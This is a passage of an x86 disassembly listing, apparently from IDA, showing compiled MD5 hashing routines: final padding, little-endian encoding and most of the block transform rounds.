mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 80h
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 3Fh
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_8], eax
cmp [ebp+var_8], 8
jnb short loc_40F2E1
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 38h
push 0
mov eax, [ebp+arg_4]
add eax, 18h
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_40F2F5
; ---------------------------------------------------------------------------
loc_40F2E1: ; CODE XREF: sub_40F26E+3B�j
mov eax, [ebp+var_8]
sub eax, 8
push eax
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
loc_40F2F5: ; CODE XREF: sub_40F26E+71�j
push 8
mov eax, [ebp+arg_4]
add eax, 10h
push eax
mov eax, [ebp+arg_4]
add eax, 50h
push eax
call sub_40F33F
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 10h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F33F
add esp, 0Ch
push 4
push 0
push [ebp+arg_4]
call sub_416B6A ; memset
add esp, 0Ch
leave
retn
sub_40F26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F33F proc near ; CODE XREF: sub_40F26E+97�p
; sub_40F26E+B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_40F35E
; ---------------------------------------------------------------------------
loc_40F34E: ; CODE XREF: sub_40F33F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_40F35E: ; CODE XREF: sub_40F33F+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_40F3CC
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 10h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+2], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 18h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+3], al
jmp short loc_40F34E
; ---------------------------------------------------------------------------
locret_40F3CC: ; CODE XREF: sub_40F33F+25�j
leave
retn
sub_40F33F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3CE proc near ; CODE XREF: sub_40F159+AA�p
; sub_40F159+E3�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_50]
push eax
call sub_410244
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-28955B88h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-173848AAh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+242070DBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3E423112h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0A83F051h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4787C62Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-57CFB9EDh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+698098D8h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-74BB0851h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0A44Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-76A32842h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6B901122h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5986BC72h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+49B40821h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+265E5A51h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-16493856h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+2441453h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-275E197Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-182C0438h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0B2AF279h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+455A14EDh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-561C16FBh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3105C08h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+676F02D9h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-72D5B376h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5C6BEh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-788E097Fh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+6D9D6122h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-21AC7F4h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5B4115BCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-944B4B0h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-41404390h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+289B7EC6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-155ED806h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4881D05h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-262B2FC7h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1924661Bh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0BD6DDBCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+432AFF97h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-546BDC59h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-36C5FC7h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
